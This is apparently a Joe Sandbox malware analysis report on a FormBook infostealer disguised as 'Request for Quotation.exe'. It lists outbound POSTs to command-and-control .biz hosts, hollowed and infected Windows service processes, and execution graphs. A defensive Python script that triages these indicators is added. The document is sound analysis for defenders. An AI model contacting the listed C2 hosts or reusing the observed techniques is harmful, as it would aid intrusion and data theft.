                                      Date: Tue, 10 Dec 2024 15:40:25 GMT
                                      Content-Type: text/html
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Set-Cookie: btst=6e69738ab52890a1bd33b43a8f86023d|8.46.123.175|1733845225|1733845225|0|1|0; path=/; domain=.knjghuig.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                      Set-Cookie: snkz=8.46.123.175; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                      Data Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                       Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                       6 | 192.168.2.4 | 49900 | 18.141.10.107 | 80 |  | 
                                       Timestamp | Bytes transferred | Direction | Data
                                       Dec 10, 2024 16:42:04.455202103 CET | 357 | OUT | POST /ytpebbldheutao HTTP/1.1
                                      Cache-Control: no-cache
                                      Connection: Keep-Alive
                                      Pragma: no-cache
                                      Host: vcddkls.biz
                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                      Content-Length: 874
                                       Dec 10, 2024 16:42:04.455202103 CET | 874 | OUT | Data Raw: 9d 82 d8 77 aa 0d 5b bb 5e 03 00 00 21 a6 4c 82 c6 53 2c a9 4b 2b 56 79 92 08 1e 3d b2 84 d2 e9 40 19 68 99 75 c6 eb ef 5a b7 b1 45 05 7d 8a 40 0a 39 3a 79 4b 68 ea d7 78 97 6d c2 d5 c5 e5 a7 48 e8 7a f9 04 af 9d 1a 30 56 52 a1 27 a3 fc 58 be 11
                                       Dec 10, 2024 16:42:06.457366943 CET | 411 | IN | HTTP/1.1 200 OK
                                      Server: nginx
                                      Date: Tue, 10 Dec 2024 15:42:06 GMT
                                      Content-Type: text/html
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Set-Cookie: btst=3d34cf6af452d2481d17e3e04270950d|8.46.123.175|1733845326|1733845326|0|1|0; path=/; domain=.vcddkls.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                      Set-Cookie: snkz=8.46.123.175; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                      Data Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Target ID:0
                                      Start time:10:40:01
                                      Start date:10/12/2024
                                      Path:C:\Users\user\Desktop\Request for Quotation.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\Request for Quotation.exe"
                                      Imagebase:0x400000
                                      File size:1'795'584 bytes
                                      MD5 hash:FE6FB05450B37478070255DCF0A11654
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:true

                                      Target ID:1
                                      Start time:10:40:01
                                      Start date:10/12/2024
                                      Path:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
                                      Imagebase:0x400000
                                      File size:1'658'880 bytes
                                      MD5 hash:68F239C01813FB34CDEBECC73B16EDE9
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Antivirus matches:
                                      • Detection: 100%, Avira
                                      • Detection: 100%, Joe Sandbox ML
                                      Reputation:low
                                      Has exited:false

                                      Target ID:2
                                      Start time:10:40:02
                                      Start date:10/12/2024
                                      Path:C:\Windows\System32\alg.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\System32\alg.exe
                                      Imagebase:0x140000000
                                      File size:1'594'368 bytes
                                      MD5 hash:5814D242CD3F0A5096ACA78A36BA8FA8
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Antivirus matches:
                                      • Detection: 100%, Avira
                                      • Detection: 100%, Joe Sandbox ML
                                      Reputation:low
                                      Has exited:false

                                      Target ID:3
                                      Start time:10:40:02
                                      Start date:10/12/2024
                                      Path:C:\Windows\System32\drivers\AppVStrm.sys
                                      Wow64 process (32bit):
                                      Commandline:
                                      Imagebase:
                                      File size:138'056 bytes
                                      MD5 hash:BDA55F89B69757320BC125FF1CB53B26
                                      Has elevated privileges:
                                      Has administrator privileges:
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate
                                      Has exited:false

                                      Target ID:4
                                      Start time:10:40:02
                                      Start date:10/12/2024
                                      Path:C:\Windows\System32\drivers\AppvVemgr.sys
                                      Wow64 process (32bit):
                                      Commandline:
                                      Imagebase:
                                      File size:174'408 bytes
                                      MD5 hash:E70EE9B57F8D771E2F4D6E6B535F6757
                                      Has elevated privileges:
                                      Has administrator privileges:
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate
                                      Has exited:false

                                      Target ID:5
                                      Start time:10:40:02
                                      Start date:10/12/2024
                                      Path:C:\Windows\System32\drivers\AppvVfs.sys
                                      Wow64 process (32bit):
                                      Commandline:
                                      Imagebase:
                                      File size:154'952 bytes
                                      MD5 hash:2CBABD729D5E746B6BD8DC1B4B4DB1E1
                                      Has elevated privileges:
                                      Has administrator privileges:
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate
                                      Has exited:false

                                      Target ID:6
                                      Start time:10:40:02
                                      Start date:10/12/2024
                                      Path:C:\Windows\System32\AppVClient.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\AppVClient.exe
                                      Imagebase:0x140000000
                                      File size:1'348'608 bytes
                                      MD5 hash:5DD1E83A36E68A7B8F2D74514F9AFFA1
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Antivirus matches:
                                      • Detection: 100%, Avira
                                      • Detection: 100%, Joe Sandbox ML
                                      Reputation:low
                                      Has exited:true

                                      Target ID:9
                                      Start time:10:40:05
                                      Start date:10/12/2024
                                      Path:C:\Windows\System32\FXSSVC.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\fxssvc.exe
                                      Imagebase:0x140000000
                                      File size:1'242'624 bytes
                                      MD5 hash:4858CF6BC0503B39DCDAD51E994CDEF5
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Antivirus matches:
                                      • Detection: 100%, Avira
                                      • Detection: 100%, Joe Sandbox ML
                                      Reputation:low
                                      Has exited:true

                                      Target ID:10
                                      Start time:10:40:07
                                      Start date:10/12/2024
                                      Path:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe"
                                      Imagebase:0x140000000
                                      File size:2'354'176 bytes
                                      MD5 hash:50E9A4F9451FF8D2C576BF053A02B0D7
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Antivirus matches:
                                      • Detection: 100%, Avira
                                      • Detection: 100%, Joe Sandbox ML
                                      Reputation:low
                                      Has exited:false

                                      Target ID:11
                                      Start time:10:40:07
                                      Start date:10/12/2024
                                      Path:C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
                                      Imagebase:0x140000000
                                      File size:1'725'440 bytes
                                      MD5 hash:3F3BEE4315081168FC542419E2F2D1A6
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Antivirus matches:
                                      • Detection: 100%, Avira
                                      • Detection: 100%, Joe Sandbox ML
                                      Reputation:low
                                      Has exited:true

                                      Target ID:12
                                      Start time:10:40:07
                                      Start date:10/12/2024
                                      Path:C:\Windows\System32\msdtc.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\System32\msdtc.exe
                                      Imagebase:0x140000000
                                      File size:1'647'104 bytes
                                      MD5 hash:D8FC46BD67F795631C6DAD07E33247EE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Antivirus matches:
                                      • Detection: 100%, Avira
                                      • Detection: 100%, Joe Sandbox ML
                                      Reputation:low
                                      Has exited:false

                                      Target ID:13
                                      Start time:10:40:08
                                      Start date:10/12/2024
                                      Path:C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe
                                      Imagebase:0x140000000
                                      File size:1'604'608 bytes
                                      MD5 hash:65E45E0DE8536F3B14E886405F9D1C56
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Antivirus matches:
                                      • Detection: 100%, Avira
                                      • Detection: 100%, Joe Sandbox ML
                                      Reputation:low
                                      Has exited:false

                                      Target ID:14
                                      Start time:10:40:08
                                      Start date:10/12/2024
                                      Path:C:\Windows\SysWOW64\perfhost.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\SysWow64\perfhost.exe
                                      Imagebase:0x400000
                                      File size:1'519'616 bytes
                                      MD5 hash:E14C66701387555047BA9BBD23773B82
                                      Has elevated privileges:true
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Antivirus matches:
                                      • Detection: 100%, Avira
                                      • Detection: 100%, Joe Sandbox ML
                                      Reputation:low
                                      Has exited:false

                                      Target ID:15
                                      Start time:10:40:08
                                      Start date:10/12/2024
                                      Path:C:\Windows\System32\Locator.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\locator.exe
                                      Imagebase:0x140000000
                                      File size:1'509'888 bytes
                                      MD5 hash:0EA212771D99ED9B59C38AC619AF79B7
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Antivirus matches:
                                      • Detection: 100%, Avira
                                      • Detection: 100%, Joe Sandbox ML
                                      Reputation:low
                                      Has exited:false

                                      Target ID:16
                                      Start time:10:40:09
                                      Start date:10/12/2024
                                      Path:C:\Windows\System32\SensorDataService.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\System32\SensorDataService.exe
                                      Imagebase:0x140000000
                                      File size:1'846'784 bytes
                                      MD5 hash:B7946E1BA775337FEE4E6785A5E67187
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Antivirus matches:
                                      • Detection: 100%, Avira
                                      • Detection: 100%, Joe Sandbox ML
                                      Reputation:low
                                      Has exited:true

                                      Target ID:17
                                      Start time:10:40:09
                                      Start date:10/12/2024
                                      Path:C:\Windows\System32\snmptrap.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\System32\snmptrap.exe
                                      Imagebase:0x140000000
                                      File size:1'515'520 bytes
                                      MD5 hash:612475391C7276C2E25FF0A0CCAD3C66
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Antivirus matches:
                                      • Detection: 100%, Avira
                                      • Detection: 100%, Joe Sandbox ML
                                      Reputation:low
                                      Has exited:false

                                      Target ID:18
                                      Start time:10:40:09
                                      Start date:10/12/2024
                                      Path:C:\Windows\System32\Spectrum.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\spectrum.exe
                                      Imagebase:0x140000000
                                      File size:1'455'616 bytes
                                      MD5 hash:7708CE35FBFD8CB3DA18C4C0207016DB
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Antivirus matches:
                                      • Detection: 100%, Avira
                                      • Detection: 100%, Joe Sandbox ML
                                      Reputation:low
                                      Has exited:false

                                      Target ID:19
                                      Start time:10:40:09
                                      Start date:10/12/2024
                                      Path:C:\Windows\SysWOW64\svchost.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\Request for Quotation.exe"
                                      Imagebase:0x710000
                                      File size:46'504 bytes
                                      MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000013.00000002.2017731706.0000000003310000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000013.00000002.2016638909.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                      Reputation:high
                                      Has exited:true

                                      Target ID:20
                                      Start time:10:40:09
                                      Start date:10/12/2024
                                      Path:C:\Windows\System32\OpenSSH\ssh-agent.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\System32\OpenSSH\ssh-agent.exe
                                      Imagebase:0x140000000
                                      File size:1'880'064 bytes
                                      MD5 hash:7765865BFBC2AA0361E0E3A618C590B8
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Antivirus matches:
                                      • Detection: 100%, Avira
                                      • Detection: 100%, Joe Sandbox ML
                                      Reputation:low
                                      Has exited:false

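The process list above shows the two patterns a responder should pull out of a report like this: Windows service binaries (FXSSVC.exe, msdtc.exe, ssh-agent.exe and the others under C:\Windows and C:\Program Files) now carrying antivirus hits, and a 32-bit svchost.exe (Target ID 19) whose command line is the original sample's path and whose memory matches the FormBook Yara rule. The script below is an added example, not part of the Joe Sandbox report: it parses "Target ID" blocks in the layout used above and flags those indicators. The three records embedded as input are abbreviated copies of Target IDs 9, 14 and 19 from this page; the indicator names and the list of operating-system directories are the example's own choices.

```python
import re
from dataclasses import dataclass, field

# Constructed input: abbreviated copies of Target IDs 9, 14 and 19 from the report
# above, in the same "Key:Value" / bullet-list layout. Test data, not a live feed.
SAMPLE = r"""
Target ID:9
Path:C:\Windows\System32\FXSSVC.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\fxssvc.exe
Imagebase:0x140000000
MD5 hash:4858CF6BC0503B39DCDAD51E994CDEF5
Antivirus matches:
• Detection: 100%, Avira
• Detection: 100%, Joe Sandbox ML
Reputation:low

Target ID:14
Path:C:\Windows\SysWOW64\perfhost.exe
Wow64 process (32bit):true
Commandline:C:\Windows\SysWow64\perfhost.exe
Imagebase:0x400000
MD5 hash:E14C66701387555047BA9BBD23773B82
Antivirus matches:
• Detection: 100%, Avira
• Detection: 100%, Joe Sandbox ML
Reputation:low

Target ID:19
Path:C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\Desktop\Request for Quotation.exe"
Imagebase:0x710000
MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
Yara matches:
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000013.00000002.2016638909.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:high
"""

# Directories whose binaries should never carry an AV hit in a clean run (example's choice).
OS_DIRS = ("c:\\windows\\", "c:\\program files")


@dataclass
class Target:
    target_id: int
    fields: dict = field(default_factory=dict)  # scalar "Key:Value" lines
    lists: dict = field(default_factory=dict)   # bullet lists keyed by their header line


def parse_targets(text: str) -> list[Target]:
    """Split blank-line separated 'Target ID' blocks into Target records."""
    targets, current, list_key = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            list_key = None
            continue
        if line.startswith("•"):                      # item of the current bullet list
            if current is not None and list_key is not None:
                current.lists.setdefault(list_key, []).append(line.lstrip("• ").strip())
            continue
        key, sep, value = line.partition(":")         # first colon only: paths keep "C:\"
        if not sep:
            continue
        key, value = key.strip(), value.strip()
        if key == "Target ID":
            current = Target(int(value))
            targets.append(current)
            list_key = None
        elif current is not None and value == "":     # "Antivirus matches:" opens a list
            list_key = key
        elif current is not None:
            current.fields[key] = value
            list_key = None
    return targets


def image_name(cmdline: str) -> str:
    """Lower-cased executable basename from a command line (quoted or bare first token)."""
    cmdline = cmdline.strip()
    if cmdline.startswith('"'):
        end = cmdline.find('"', 1)
        exe = cmdline[1:end] if end > 0 else cmdline[1:]
    else:
        exe = cmdline.split()[0] if cmdline.split() else ""
    return exe.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def assess(t: Target) -> list[tuple[str, str]]:
    """Return (indicator, detail) pairs for one process record."""
    findings = []
    path = t.fields.get("Path", "")
    on_disk = path.rsplit("\\", 1)[-1].lower()
    in_cmd = image_name(t.fields.get("Commandline", ""))
    if on_disk and in_cmd and on_disk != in_cmd:     # hollowing: image != command line
        findings.append(("image-mismatch", f"{on_disk} runs with the command line of {in_cmd}"))
    wow64 = t.fields.get("Wow64 process (32bit)", "").lower() == "true"
    base = int(t.fields.get("Imagebase", "0"), 16)
    if wow64 and base > 0xFFFFFFFF:                  # 32-bit process cannot map above 4 GiB
        findings.append(("bitness-mismatch", f"32-bit process with image base {base:#x}"))
    if path.lower().startswith(OS_DIRS) and t.lists.get("Antivirus matches"):
        findings.append(("av-hit-on-host-binary", path))
    for entry in t.lists.get("Yara matches", []):
        m = re.search(r"Rule:\s*([^,]+)", entry)
        findings.append(("yara-in-memory", m.group(1).strip() if m else entry))
    return findings


def triage(text: str) -> dict[int, list[str]]:
    """Indicator codes per Target ID, omitting records with no findings."""
    out = {}
    for t in parse_targets(text):
        codes = [code for code, _ in assess(t)]
        if codes:
            out[t.target_id] = codes
    return out


if __name__ == "__main__":
    for t in parse_targets(SAMPLE):
        for code, detail in assess(t):
            print(f"target {t.target_id}: {code}: {detail}")
```

Run as a file it prints one line per finding; `triage()` returns only the indicator codes per Target ID so the result can be asserted or forwarded. Only the image basename is compared, so a command line that differs merely in case or directory spelling (Target ID 14, SysWOW64 versus SysWow64) is not flagged, while svchost.exe started with the sample's own path is.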

                                        Execution Graph

                                        Execution Coverage:4%
                                        Dynamic/Decrypted Code Coverage:97.8%
                                        Signature Coverage:8.6%
                                        Total number of Nodes:93
                                        Total number of Limit Nodes:5
                                        execution_graph (rendered as an interactive graph on the original page; numeric node edges omitted). Entry nodes and the API calls reachable from them, as recovered from the graph data:
                                        • c35be2 -> c35bfc CloseHandle
                                        • c35b42 -> c35b07 -> c35cdf CreateThread -> c354a0 -> c35522 VirtualAlloc; c35c01 -> c35c03 CloseHandle
                                        • c35b00 -> c35bba -> c452c0 -> c3e050 -> c3e0d8 VirtualAlloc; c35bc7 -> c50080 (5 API calls: c503e0 GetComputerNameW, c50181 VirtualFree, c3e050 VirtualAlloc, c503bf GetUserNameW, c504d6 GetComputerNameW) -> c35c7b -> c38070 (c38186 CloseHandle, c381ad GetTokenInformation, c380ca GetTokenInformation)
                                        • c35860 -> c452c0 VirtualAlloc -> c50080 (5 API calls) -> c38070 (3 API calls)
                                        • c35b87 CreateThread -> c35810; c35b1c -> c35cdf CreateThread -> c354a0 VirtualAlloc; c35c01 -> c35c03 CloseHandle
                                        • c354c4 -> c35522 VirtualAlloc
                                        • c35b09 -> c35b16 -> c35cdf CreateThread -> c354a0 VirtualAlloc; c35c01 -> c35c03 CloseHandle
                                        • c355ef -> c355ac -> c53870 -> c53720 -> c40c42 -> c3e050 VirtualAlloc
                                        • c381b1 and c38090 -> c38075 -> c38186 CloseHandle, c380ca GetTokenInformation, c381ad GetTokenInformation
                                        • c357f0 -> c355ac -> c53870 VirtualAlloc

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph for the function at 0xC50080 (rendered as an interactive graph on the original page; block edges omitted). Basic blocks that call APIs or internal functions: c50181 VirtualFree; c501a8-c502ac call c67164; c501ec-c50313 call c6715c; c502ef-c50495 call c3e050 (twice); c503bf-c503d9 GetUserNameW; c50458-c50472 GetComputerNameW; c504cc-c504e6 call c69970, GetComputerNameW.
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1735053093.0000000000C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_c30000_AppVClient.jbxd
                                        Similarity
                                        • API ID: ComputerName
                                        • String ID:
                                        • API String ID: 3545744682-0
                                        • Opcode ID: f2c426ce008c29bb37f5d3562478f99eada15862b80321597c233d777d3b9804
                                        • Instruction ID: 2016ceaab3752c7d76ec6b6d76f55c8f77f73771e19e0cafb20109e37d0b3ad6
                                        • Opcode Fuzzy Hash: f2c426ce008c29bb37f5d3562478f99eada15862b80321597c233d777d3b9804
                                        • Instruction Fuzzy Hash: 8FD12535418F098BC728EF58CC467EAB7D1FBA0311F68461FDC56C3164DA749A8986C6

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph for the function at 0xC352A0 (blocks c352a0 through c35443 and c70d4c-c70d4e; rendered as an interactive graph on the original page, block edges omitted). The graph data annotates no API call on a block; the single API reference is listed under APIs below.
                                        APIs
                                        • GetSystemDefaultLangID.KERNELBASE ref: 00C353C4
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1735053093.0000000000C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_c30000_AppVClient.jbxd
                                        Similarity
                                        • API ID: DefaultLangSystem
                                        • String ID:
                                        • API String ID: 706401283-0
                                        • Opcode ID: be85cc28eff309c6b04ec446b1d1922c7f56a33d23bc4027ac3bc4e0d37bd274
                                        • Instruction ID: 4c4386b50d5bd3081784346ae7bda678ec785bae294d4bcb5eb72f0942df6c8f
                                        • Opcode Fuzzy Hash: be85cc28eff309c6b04ec446b1d1922c7f56a33d23bc4027ac3bc4e0d37bd274
                                        • Instruction Fuzzy Hash: 00413AA183DED58FD36A432544643B17BD09B123E2F9D04D7D4E3CB0F2E1990E819766

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph for the function at 0xC38070 (rendered as an interactive graph on the original page; block edges omitted). Basic blocks that call APIs or internal functions: c380ca-c380d8 GetTokenInformation; c38163-c38170 call c67164; c38186 CloseHandle; c381d7-c381de call c6715c; c381fe-c38201 GetTokenInformation; c38228-c382ee call c35d90; c38253-c38265 call c51280; c382a1-c382ba call c35d90, call c3ec00; c382f7-c382fc call c35d90.
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1735053093.0000000000C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_c30000_AppVClient.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: bfa7abbba837048b5084d14a6e3f10e10a947a6e49ec2fa660cf16e8a7df21b7
                                        • Instruction ID: 1a9ea4b6acb718ff408c05b3e76dcc5c65ffb6d0b8460811c70eb63dc9e8e4c9
                                        • Opcode Fuzzy Hash: bfa7abbba837048b5084d14a6e3f10e10a947a6e49ec2fa660cf16e8a7df21b7
                                        • Instruction Fuzzy Hash: DA61677063CB459FCBA98B29881437E7BA0FB55350F68025AF467C32A0DF285E4DD752

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph for the function at 0xC35B09 (rendered as an interactive graph on the original page; block edges omitted). Basic blocks that call APIs: c35c01-c35d41 CloseHandle; c35cda-c35ce4 CreateThread.
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1735053093.0000000000C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_c30000_AppVClient.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 355f5de826a502d2b078035f50b0d1b19bc6bd6d86d359f9387c1ff3fa9cfd06
                                        • Instruction ID: d5b88156e1bb2605f530ab7b94ef2fbd4ff5ce4cd0f64551362d6d87cf4d8771
                                        • Opcode Fuzzy Hash: 355f5de826a502d2b078035f50b0d1b19bc6bd6d86d359f9387c1ff3fa9cfd06
                                        • Instruction Fuzzy Hash: E701F13053DF868FDB665725AD18379BBD0AB1832CF2805ABC497CA0D5DBA08B00E752

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph for the function at 0xC35910 (rendered as an interactive graph on the original page; block edges omitted). No Win32 API is annotated on a block; blocks that call internal functions: c35915-c35928 call c69970; c3593b-c35a15 call c511a0; c359a1-c359b5 call c35e10; c359b8 call c50df0; c359bd-c359c2 call c35d90; c359d9-c359de call c62190; c35a75-c35ab3 call c51280.
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1735053093.0000000000C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_c30000_AppVClient.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 61e7e04614083fc9a4d415ed1ed9d586c41edeef07ca5b9990f411115d9a6df2
                                        • Instruction ID: bf73485cd105b51094b2ac9823f28b9366ff857c8c2c9f2d077fa749a623d597
                                        • Opcode Fuzzy Hash: 61e7e04614083fc9a4d415ed1ed9d586c41edeef07ca5b9990f411115d9a6df2
                                        • Instruction Fuzzy Hash: 16F16A2072CF488FC769971D58413B973D2FB99310F58429EE85BC3296DE349D8AA386

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph for the function at 0xC35B42 (rendered as an interactive graph on the original page; block edges omitted). Basic blocks that call APIs or internal functions: c35b42-c35b47 call c35d90; c35c01-c35c05 CloseHandle; c35c42-c35c62 call c51280; c35cc2-c35cc9 call c352a0; c35ccf-c35ce4 CreateThread.
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1735053093.0000000000C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_c30000_AppVClient.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2ff8010c23fac40248132f603dcb160a69be8753e27de13806aa853a5623418f
                                        • Instruction ID: 42965785af1faf843d9b00051d729b98162cc595bfdd4548688d0347fcbf7532
                                        • Opcode Fuzzy Hash: 2ff8010c23fac40248132f603dcb160a69be8753e27de13806aa853a5623418f
                                        • Instruction Fuzzy Hash: BE21033023CF40CFCB69AB19E4887B4B7E1EB5D318F6811A68467CF1E2CA24CE449356

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 410 c35b87-c35d01 CreateThread 414 c35d07 410->414 415 c35bb4 410->415 414->415 416 c35d0d 414->416 417 c35c01-c35c05 CloseHandle 415->417 418 c35cda-c35ce4 CreateThread 415->418 421 c35d37-c35d41 417->421 418->417 422 c35cea 418->422 423 c35d43 421->423 424 c35d4b-c35d52 421->424 422->417 425 c35cf0-c35cf6 422->425 428 c35d54 423->428 427 c35d45-c35d47 424->427 424->428 429 c35d49 427->429 430 c35d5f 427->430 429->424 429->430 432 c35d65 430->432 432->432
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1735053093.0000000000C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_c30000_AppVClient.jbxd
                                        Similarity
                                        • API ID: CreateThread
                                        • String ID:
                                        • API String ID: 2422867632-0
                                        • Opcode ID: a986bd5c00f5553bdb8598d00602888b78738e64b994e3da4fa4453f2922062f
                                        • Instruction ID: 0496a2221e3805dc4ff6d28e7fae752db1d092af1d1ec665e8d274587bd8a99f
                                        • Opcode Fuzzy Hash: a986bd5c00f5553bdb8598d00602888b78738e64b994e3da4fa4453f2922062f
                                        • Instruction Fuzzy Hash: F8E0863062DB444FDB599B24581071D7AE5EB88318F1501CEC44AD71D1CB694A058792

                                        Control-flow Graph

                                        control_flow_graph 433 c3599b-c3599e 434 c359f7 433->434 435 c359b8 call c50df0 433->435 436 c35a02 434->436 439 c359bd-c359c2 call c35d90 435->439 441 c359d4 436->441 442 c3597d 436->442 443 c359c7-c359ce 439->443 444 c3593b-c35a15 call c511a0 441->444 445 c359d8 441->445 442->441 446 c3597f-c35981 442->446 448 c359d0 443->448 449 c35a1a-c35a26 443->449 456 c359d9-c359de call c62190 445->456 447 c35983-c35a38 446->447 457 c35994-c3599c 447->457 458 c35a3e 447->458 448->449 453 c359d2-c359de 448->453 454 c359a1-c359b5 call c35e10 449->454 455 c35a2c-c35a34 449->455 453->457 466 c359e0 453->466 454->435 467 c35a08-c35a0b 454->467 455->456 456->457 456->466 457->436 463 c3599e 457->463 458->455 463->434 466->457 469 c359e2-c359ec 466->469 467->457 468 c35a0d 467->468 475 c35932 468->475 476 c35991 468->476 471 c35a62-c35a6e 469->471 472 c359ee-c359ef 469->472 473 c35a70 471->473 474 c35a75-c35ab3 call c51280 471->474 472->447 477 c359f1 call c69970 472->477 473->474 479 c35a72 473->479 487 c35ab5 474->487 488 c35abb-c35ac9 474->488 476->475 478 c35993 476->478 477->435 478->457 479->474 487->488 489 c35ab7-c35ab9 487->489 490 c35af2-c35af5 488->490 489->488 494 c35ad5 490->494 495 c35adb-c35adc 490->495 494->495 496 c35ad7-c35ad9 494->496 497 c35ae2 495->497 498 c35a45-c35a46 495->498 496->495 497->498 499 c35ae8 497->499 499->490
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1735053093.0000000000C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
